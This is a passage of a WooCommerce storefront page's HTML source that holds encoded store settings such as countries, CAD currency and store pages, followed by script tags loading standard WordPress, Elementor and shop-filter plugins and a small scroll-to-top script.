2%3A%22Namibia%22%2C%22NR%22%3A%22Nauru%22%2C%22NP%22%3A%22Nepal%22%2C%22NL%22%3A%22Netherlands%22%2C%22NC%22%3A%22New%20Caledonia%22%2C%22NZ%22%3A%22New%20Zealand%22%2C%22NI%22%3A%22Nicaragua%22%2C%22NE%22%3A%22Niger%22%2C%22NG%22%3A%22Nigeria%22%2C%22NU%22%3A%22Niue%22%2C%22NF%22%3A%22Norfolk%20Island%22%2C%22KP%22%3A%22North%20Korea%22%2C%22MK%22%3A%22North%20Macedonia%22%2C%22MP%22%3A%22Northern%20Mariana%20Islands%22%2C%22NO%22%3A%22Norway%22%2C%22OM%22%3A%22Oman%22%2C%22PK%22%3A%22Pakistan%22%2C%22PS%22%3A%22Palestinian%20Territory%22%2C%22PA%22%3A%22Panama%22%2C%22PG%22%3A%22Papua%20New%20Guinea%22%2C%22PY%22%3A%22Paraguay%22%2C%22PE%22%3A%22Peru%22%2C%22PH%22%3A%22Philippines%22%2C%22PN%22%3A%22Pitcairn%22%2C%22PL%22%3A%22Poland%22%2C%22PT%22%3A%22Portugal%22%2C%22PR%22%3A%22Puerto%20Rico%22%2C%22QA%22%3A%22Qatar%22%2C%22RE%22%3A%22Reunion%22%2C%22RO%22%3A%22Romania%22%2C%22RU%22%3A%22Russia%22%2C%22RW%22%3A%22Rwanda%22%2C%22ST%22%3A%22S%26atilde%3Bo%20Tom%26eacute%3B%20and%20Pr%26iacute%3Bncipe%22%2C%22BL%22%3A%22Saint%20Barth%26eacute%3Blemy%22%2C%22SH%22%3A%22Saint%20Helena%22%2C%22KN%22%3A%22Saint%20Kitts%20and%20Nevis%22%2C%22LC%22%3A%22Saint%20Lucia%22%2C%22SX%22%3A%22Saint%20Martin%20%28Dutch%20part%29%22%2C%22MF%22%3A%22Saint%20Martin%20%28French%20part%29%22%2C%22PM%22%3A%22Saint%20Pierre%20and%20Miquelon%22%2C%22VC%22%3A%22Saint%20Vincent%20and%20the%20Grenadines%22%2C%22WS%22%3A%22Samoa%22%2C%22SM%22%3A%22San%20Marino%22%2C%22SA%22%3A%22Saudi%20Arabia%22%2C%22SN%22%3A%22Senegal%22%2C%22RS%22%3A%22Serbia%22%2C%22SC%22%3A%22Seychelles%22%2C%22SL%22%3A%22Sierra%20Leone%22%2C%22SG%22%3A%22Singapore%22%2C%22SK%22%3A%22Slovakia%22%2C%22SI%22%3A%22Slovenia%22%2C%22SB%22%3A%22Solomon%20Islands%22%2C%22SO%22%3A%22Somalia%22%2C%22ZA%22%3A%22South%20Africa%22%2C%22GS%22%3A%22South%20Georgia%5C%2FSandwich%20Islands%22%2C%22KR%22%3A%22South%20Korea%22%2C%22SS%22%3A%22South%20Sudan%22%2C%22ES%22%3A%22Spain%22%2C%22LK%22%3A%22Sri%20Lanka%22%2C%22SD%22%3A%22Sudan%22%2C%22SR%22%3A%22Suriname%22%2C%22SJ%22%3A%22Svalbard%20and%20Jan%20Mayen%22%2C%22SE%22%3A%22Sweden%22%2C%22CH%22%3A%22Switzerland%22%2C%22SY%22%3A%22Syria%22%2C%22TW%22%3A%22Taiwan%22%2C%22TJ%22%3A%22Tajikistan%22%2C%22TZ%22%3A%22Tanzania%22%2C%22TH%22%3A%22Thailand%22%2C%22TL%22%3A%22Timor-Leste%22%2C%22TG%22%3A%22Togo%22%2C%22TK%22%3A%22Tokelau%22%2C%22TO%22%3A%22Tonga%22%2C%22TT%22%3A%22Trinidad%20and%20Tobago%22%2C%22TN%22%3A%22Tunisia%22%2C%22TR%22%3A%22Turkey%22%2C%22TM%22%3A%22Turkmenistan%22%2C%22TC%22%3A%22Turks%20and%20Caicos%20Islands%22%2C%22TV%22%3A%22Tuvalu%22%2C%22UG%22%3A%22Uganda%22%2C%22UA%22%3A%22Ukraine%22%2C%22AE%22%3A%22United%20Arab%20Emirates%22%2C%22GB%22%3A%22United%20Kingdom%20%28UK%29%22%2C%22US%22%3A%22United%20States%20%28US%29%22%2C%22UM%22%3A%22United%20States%20%28US%29%20Minor%20Outlying%20Islands%22%2C%22UY%22%3A%22Uruguay%22%2C%22UZ%22%3A%22Uzbekistan%22%2C%22VU%22%3A%22Vanuatu%22%2C%22VA%22%3A%22Vatican%22%2C%22VE%22%3A%22Venezuela%22%2C%22VN%22%3A%22Vietnam%22%2C%22VG%22%3A%22Virgin%20Islands%20%28British%29%22%2C%22VI%22%3A%22Virgin%20Islands%20%28US%29%22%2C%22WF%22%3A%22Wallis%20and%20Futuna%22%2C%22EH%22%3A%22Western%20Sahara%22%2C%22YE%22%3A%22Yemen%22%2C%22ZM%22%3A%22Zambia%22%2C%22ZW%22%3A%22Zimbabwe%22%7D%2C%22currency%22%3A%7B%22code%22%3A%22CAD%22%2C%22precision%22%3A2%2C%22symbol%22%3A%22%24%22%2C%22symbolPosition%22%3A%22left%22%2C%22decimalSeparator%22%3A%22.%22%2C%22thousandSeparator%22%3A%22%2C%22%2C%22priceFormat%22%3A%22%251%24s%5Cu00a0%252%24s%22%7D%2C%22currentUserId%22%3A0%2C%22currentUserIsAdmin%22%3Afalse%2C%22homeUrl%22%3A%22https%3A%5C%2F%5C%2Fshopopenmarket.com%5C%2F%22%2C%22locale%22%3A%7B%22siteLocale%22%3A%22en_US%22%2C%22userLocale%22%3A%22en_US%22%2C%22weekdaysShort%22%3A%5B%22Sun%22%2C%22Mon%22%2C%22Tue%22%2C%22Wed%22%2C%22Thu%22%2C%22Fri%22%2C%22Sat%22%5D%7D%2C%22dashboardUrl%22%3A%22https%3A%5C%2F%5C%2Fshopopenmarket.com%5C%2Fmy-account%5C%2F%22%2C%22orderStatuses%22%3A%7B%22pending%22%3A%22Pending%20payment%22%2C%22processing%22%3A%22Processing%22%2C%22on-hold%22%3A%22On%20hold%22%2C%22completed%22%3A%22Completed%22%2C%22cancelled%22%3A%22Cancelled%22%2C%22refunded%22%3A%22Refunded%22%2C%22failed%22%3A%22Failed%22%2C%22checkout-draft%22%3A%22Draft%22%7D%2C%22placeholderImgSrc%22%3A%22https%3A%5C%2F%5C%2Fshopopenmarket.com%5C%2Fwp-content%5C%2Fuploads%5C%2Fwoocommerce-placeholder.png%22%2C%22productsSettings%22%3A%7B%22cartRedirectAfterAdd%22%3Afalse%7D%2C%22siteTitle%22%3A%22openmarket%22%2C%22storePages%22%3A%7B%22myaccount%22%3A%7B%22id%22%3A10%2C%22title%22%3A%22My%20account%22%2C%22permalink%22%3A%22https%3A%5C%2F%5C%2Fshopopenmarket.com%5C%2Fmy-account%5C%2F%22%7D%2C%22shop%22%3A%7B%22id%22%3A7%2C%22title%22%3A%22Shop%22%2C%22permalink%22%3A%22https%3A%5C%2F%5C%2Fshopopenmarket.com%5C%2Fshop%5C%2F%22%7D%2C%22cart%22%3A%7B%22id%22%3A8%2C%22title%22%3A%22Cart%22%2C%22permalink%22%3A%22https%3A%5C%2F%5C%2Fshopopenmarket.com%5C%2Fcart%5C%2F%22%7D%2C%22checkout%22%3A%7B%22id%22%3A9%2C%22title%22%3A%22Checkout%22%2C%22permalink%22%3A%22https%3A%5C%2F%5C%2Fshopopenmarket.com%5C%2Fcheckout%5C%2F%22%7D%2C%22privacy%22%3A%7B%22id%22%3A3%2C%22title%22%3A%22Privacy%20Policy%22%2C%22permalink%22%3A%22https%3A%5C%2F%5C%2Fshopopenmarket.com%5C%2Fprivacy-policy%5C%2F%22%7D%2C%22terms%22%3A%7B%22id%22%3A3%2C%22title%22%3A%22Privacy%20Policy%22%2C%22permalink%22%3A%22https%3A%5C%2F%5C%2Fshopopenmarket.com%5C%2Fprivacy-policy%5C%2F%22%7D%7D%2C%22wcAssetUrl%22%3A%22https%3A%5C%2F%5C%2Fshopopenmarket.com%5C%2Fwp-content%5C%2Fplugins%5C%2Fwoocommerce%5C%2Fassets%5C%2F%22%2C%22wcVersion%22%3A%227.5.1%22%2C%22wpLoginUrl%22%3A%22https%3A%5C%2F%5C%2Fshopopenmarket.com%5C%2Fwp-login.php%22%2C%22wpVersion%22%3A%226.1.1%22%2C%22collectableMethodIds%22%3A%5B%5D%2C%22admin%22%3A%7B%22alertCount%22%3A%221%22%2C%22visibleTaskListIds%22%3A%5B%22extended%22%2C%22extended_two_column%22%5D%7D%7D' ) ); wp.apiFetch.use( wp.apiFetch.createPreloadingMiddleware( JSON.parse( decodeURIComponent( '%5B%5D' ) ) ) ) </script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-settings.js?ver=fdeff8fe380d7a72762ba1a4be564e76' id='wc-settings-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/price-format.js?ver=67e10007e1416fd7ca104396f0f4de01' id='wc-price-format-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/woocommerce-currency-switcher/js/priceformat.js?ver=1.4.0' id='wc-priceformat-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-includes/js/dist/vendor/lodash.min.js?ver=4.17.19' id='lodash-js'></script> <script type='text/javascript' id='lodash-js-after'> window.lodash = _.noConflict(); </script> <script type='text/javascript' src='https://shopopenmarket.com/wp-includes/js/dist/vendor/react.min.js?ver=17.0.1' id='react-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-includes/js/dist/deprecated.min.js?ver=6c963cb9494ba26b77eb' id='wp-deprecated-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-includes/js/dist/dom.min.js?ver=133a042fbbef48f38107' id='wp-dom-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-includes/js/dist/vendor/react-dom.min.js?ver=17.0.1' id='react-dom-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-includes/js/dist/escape-html.min.js?ver=03e27a7b6ae14f7afaa6' id='wp-escape-html-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-includes/js/dist/element.min.js?ver=47162ff4492c7ec4956b' id='wp-element-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-includes/js/dist/is-shallow-equal.min.js?ver=20c2b06ecf04afb14fee' id='wp-is-shallow-equal-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-includes/js/dist/keycodes.min.js?ver=6e0aadc0106bd8aadc89' id='wp-keycodes-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-includes/js/dist/priority-queue.min.js?ver=99e325da95c5a35c7dc2' id='wp-priority-queue-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-includes/js/dist/compose.min.js?ver=37228270687b2a94e518' id='wp-compose-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-includes/js/dist/redux-routine.min.js?ver=c9ea6c0df793258797e6' id='wp-redux-routine-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-includes/js/dist/data.min.js?ver=d8cf5b24f99c64ae47d6' id='wp-data-js'></script> <script type='text/javascript' id='wp-data-js-after'> ( function() { var userId = 0; var storageKey = "WP_DATA_USER_" + userId; wp.data .use( wp.data.plugins.persistence, { storageKey: storageKey } ); } )(); </script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-registry.js?ver=d9e5ebec7b91a4f2437e76a667675fc5' id='wc-blocks-registry-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-includes/js/dist/data-controls.min.js?ver=e10d473d392daa8501e8' id='wp-data-controls-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-includes/js/dist/html-entities.min.js?ver=36a4a255da7dd2e1bf8e' id='wp-html-entities-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-includes/js/dist/notices.min.js?ver=9c1575b7a31659f45a45' id='wp-notices-js'></script> <script type='text/javascript' id='wc-blocks-middleware-js-before'> var wcBlocksMiddlewareConfig = { storeApiNonce: 'fc9e9fa42d', wcStoreApiNonceTimestamp: '1679614720' }; </script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-middleware.js?ver=397e7b9fdac5b97dab48de9dbcd81edd' id='wc-blocks-middleware-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-data.js?ver=892ed73ca32d3b4ec7c07493651ca9a1' id='wc-blocks-data-store-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/price-filter-frontend.js?ver=d1d6128e619610ce0721f3ca797200c4' id='wc-price-filter-block-frontend-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/woocommerce-currency-switcher/js/price-filter-frontend.js?ver=1.4.0' id='wc-price-filter-frontend-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/woocommerce-currency-switcher/js/jquery.ddslick.min.js?ver=1.4.0' id='jquery.ddslick.min-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/woocommerce-currency-switcher/js/front.js?ver=1.4.0' id='woocommerce-currency-switcher-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/woocommerce-products-filter/js/tooltip/js/tooltipster.bundle.min.js?ver=1.3.2' id='woof_tooltip-js-js'></script> <script type='text/javascript' id='woof_front-js-extra'> /* <![CDATA[ */ var woof_filter_titles = []; /* ]]> */ </script> <script type='text/javascript' id='woof_front-js-before'> var woof_is_permalink =1; var woof_shop_page = ""; var woof_m_b_container =".woocommerce-products-header"; var woof_really_curr_tax = {}; var woof_current_page_link = location.protocol + '//' + location.host + location.pathname; /*lets remove pagination from woof_current_page_link*/ woof_current_page_link = woof_current_page_link.replace(/\page\/[0-9]+/, ""); woof_current_page_link = "https://shopopenmarket.com/shop/"; var woof_link = 'https://shopopenmarket.com/wp-content/plugins/woocommerce-products-filter/'; var woof_ajaxurl = "https://shopopenmarket.com/wp-admin/admin-ajax.php"; var woof_lang = { 'orderby': "orderby", 'date': "date", 'perpage': "per page", 'pricerange': "price range", 'menu_order': "menu order", 'popularity': "popularity", 'rating': "rating", 'price': "price low to high", 'price-desc': "price high to low", 'clear_all': "Clear All" }; if (typeof woof_lang_custom == 'undefined') { var woof_lang_custom = {};/*!!important*/ } var woof_is_mobile = 0; var woof_show_price_search_button = 0; var woof_show_price_search_type = 0; var woof_show_price_search_type = 0; var swoof_search_slug = "swoof"; var icheck_skin = {}; icheck_skin = 'none'; var woof_select_type = 'chosen'; var woof_current_values = '[]'; var woof_lang_loading = "Loading ..."; var woof_lang_show_products_filter = "show products filter"; var woof_lang_hide_products_filter = "hide products filter"; var woof_lang_pricerange = "price range"; var woof_use_beauty_scroll =0; var woof_autosubmit =1; var woof_ajaxurl = "https://shopopenmarket.com/wp-admin/admin-ajax.php"; /*var woof_submit_link = "";*/ var woof_is_ajax = 0; var woof_ajax_redraw = 0; var woof_ajax_page_num =1; var woof_ajax_first_done = false; var woof_checkboxes_slide_flag = 1; /*toggles*/ var woof_toggle_type = "text"; var woof_toggle_closed_text = "+"; var woof_toggle_opened_text = "-"; var woof_toggle_closed_image = "https://shopopenmarket.com/wp-content/plugins/woocommerce-products-filter/img/plus.svg"; var woof_toggle_opened_image = "https://shopopenmarket.com/wp-content/plugins/woocommerce-products-filter/img/minus.svg"; /*indexes which can be displayed in red buttons panel*/ var woof_accept_array = ["min_price", "orderby", "perpage", "min_rating","product_visibility","product_cat","product_tag","pa_color","pa_size"]; /*for extensions*/ var woof_ext_init_functions = null; var woof_overlay_skin = "default"; function woof_js_after_ajax_done() { jQuery(document).trigger('woof_ajax_done'); } </script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/woocommerce-products-filter/js/front.js?ver=1.3.2' id='woof_front-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/woocommerce-products-filter/js/html_types/radio.js?ver=1.3.2' id='woof_radio_html_items-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/woocommerce-products-filter/js/html_types/checkbox.js?ver=1.3.2' id='woof_checkbox_html_items-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/woocommerce-products-filter/js/html_types/select.js?ver=1.3.2' id='woof_select_html_items-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/woocommerce-products-filter/js/html_types/mselect.js?ver=1.3.2' id='woof_mselect_html_items-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/woocommerce-products-filter/js/chosen/chosen.jquery.js?ver=1.3.2' id='chosen-drop-down-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/woolentor-addons/assets/lib/js/magnific-popup.js?ver=2.5.7' id='magnific-popup-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-includes/js/comment-reply.min.js?ver=6.1.1' id='comment-reply-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/woolentor-addons/assets/js/jquery.countdown.min.js?ver=2.5.7' id='countdown-min-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-includes/js/underscore.min.js?ver=1.13.4' id='underscore-js'></script> <script type='text/javascript' id='wp-util-js-extra'> /* <![CDATA[ */ var _wpUtilSettings = {"ajax":{"url":"\/wp-admin\/admin-ajax.php"}}; /* ]]> */ </script> <script type='text/javascript' src='https://shopopenmarket.com/wp-includes/js/wp-util.min.js?ver=6.1.1' id='wp-util-js'></script> <script type='text/javascript' id='wc-add-to-cart-variation-js-extra'> /* <![CDATA[ */ var wc_add_to_cart_variation_params = {"wc_ajax_url":"\/?wc-ajax=%%endpoint%%","i18n_no_matching_variations_text":"Sorry, no products matched your selection. Please choose a different combination.","i18n_make_a_selection_text":"Please select some product options before adding this product to your cart.","i18n_unavailable_text":"Sorry, this product is unavailable. Please choose a different combination."}; /* ]]> */ </script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart-variation.min.js?ver=7.5.1' id='wc-add-to-cart-variation-js'></script> <script type='text/javascript' id='woolentor-widgets-scripts-js-extra'> /* <![CDATA[ */ var woolentor_addons = {"woolentorajaxurl":"https:\/\/shopopenmarket.com\/wp-admin\/admin-ajax.php","ajax_nonce":"2f404ed82a"}; /* ]]> */ </script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/woolentor-addons/assets/js/woolentor-widgets-active.js?ver=2.5.7' id='woolentor-widgets-scripts-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.11.5' id='elementor-webpack-runtime-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.11.5' id='elementor-frontend-modules-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2' id='elementor-waypoints-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6' id='swiper-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.11.5' id='share-link-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.9.0' id='elementor-dialog-js'></script> <script type='text/javascript' id='elementor-frontend-js-before'> var elementorFrontendConfig = {"environmentMode":{"edit":false,"wpPreview":false,"isScriptDebug":false},"i18n":{"shareOnFacebook":"Share on Facebook","shareOnTwitter":"Share on Twitter","pinIt":"Pin it","download":"Download","downloadImage":"Download image","fullscreen":"Fullscreen","zoom":"Zoom","share":"Share","playVideo":"Play Video","previous":"Previous","next":"Next","close":"Close"},"is_rtl":false,"breakpoints":{"xs":0,"sm":480,"md":768,"lg":1025,"xl":1440,"xxl":1600},"responsive":{"breakpoints":{"mobile":{"label":"Mobile","value":767,"default_value":767,"direction":"max","is_enabled":true},"mobile_extra":{"label":"Mobile Extra","value":880,"default_value":880,"direction":"max","is_enabled":false},"tablet":{"label":"Tablet","value":1024,"default_value":1024,"direction":"max","is_enabled":true},"tablet_extra":{"label":"Tablet Extra","value":1200,"default_value":1200,"direction":"max","is_enabled":false},"laptop":{"label":"Laptop","value":1366,"default_value":1366,"direction":"max","is_enabled":false},"widescreen":{"label":"Widescreen","value":2400,"default_value":2400,"direction":"min","is_enabled":false}}},"version":"3.11.5","is_static":false,"experimentalFeatures":{"landing-pages":true,"kit-elements-defaults":true},"urls":{"assets":"https:\/\/shopopenmarket.com\/wp-content\/plugins\/elementor\/assets\/"},"swiperClass":"swiper-container","settings":{"page":[],"editorPreferences":[]},"kit":{"global_image_lightbox":"yes","active_breakpoints":["viewport_mobile","viewport_tablet"],"lightbox_enable_counter":"yes","lightbox_enable_fullscreen":"yes","lightbox_enable_zoom":"yes","lightbox_enable_share":"yes","lightbox_title_src":"title","lightbox_description_src":"description"},"post":{"id":2,"title":"openmarket%20%E2%80%93%20openmarket","excerpt":"","featuredImage":false}}; </script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.11.5' id='elementor-frontend-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/elementskit-lite/widgets/init/assets/js/animate-circle.js?ver=2.8.5' id='animate-circle-js'></script> <script type='text/javascript' id='elementskit-elementor-js-extra'> /* <![CDATA[ */ var ekit_config = {"ajaxurl":"https:\/\/shopopenmarket.com\/wp-admin\/admin-ajax.php","nonce":"95105b9851"}; /* ]]> */ </script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/elementskit-lite/widgets/init/assets/js/elementor.js?ver=2.8.5' id='elementskit-elementor-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.11.5' id='preloaded-modules-js'></script> <script type='text/javascript'> !function(){"use strict";function o(){document.body.scrollTop>c||document.documentElement.scrollTop>c?n.style.display="block":n.style.display="none"}function t(o,e){if(!(0>=e)){var n=0-o.scrollTop,c=n/e*10;setTimeout(function(){o.scrollTop=o.scrollTop+c,0!==o.scrollTop&&t(o,e-10)},10)}}var e,n=document.querySelector("#scrollup-master");if(n){var c=parseInt(n.getAttribute("data-distance"));document.addEventListener("DOMContentLoaded",function(){window.addEventListener("scroll",function(){o()})}),n.addEventListener("click",function(){document.body.scrollTop?e=document.body:document.documentElement.scrollTop&&(e=document.documentElement),t(e,300)})}}(); </script> </body> </html> <!-- Page generated by LiteSpeed Cache 5.3.3 on 2023-03-23 23:38:42 -->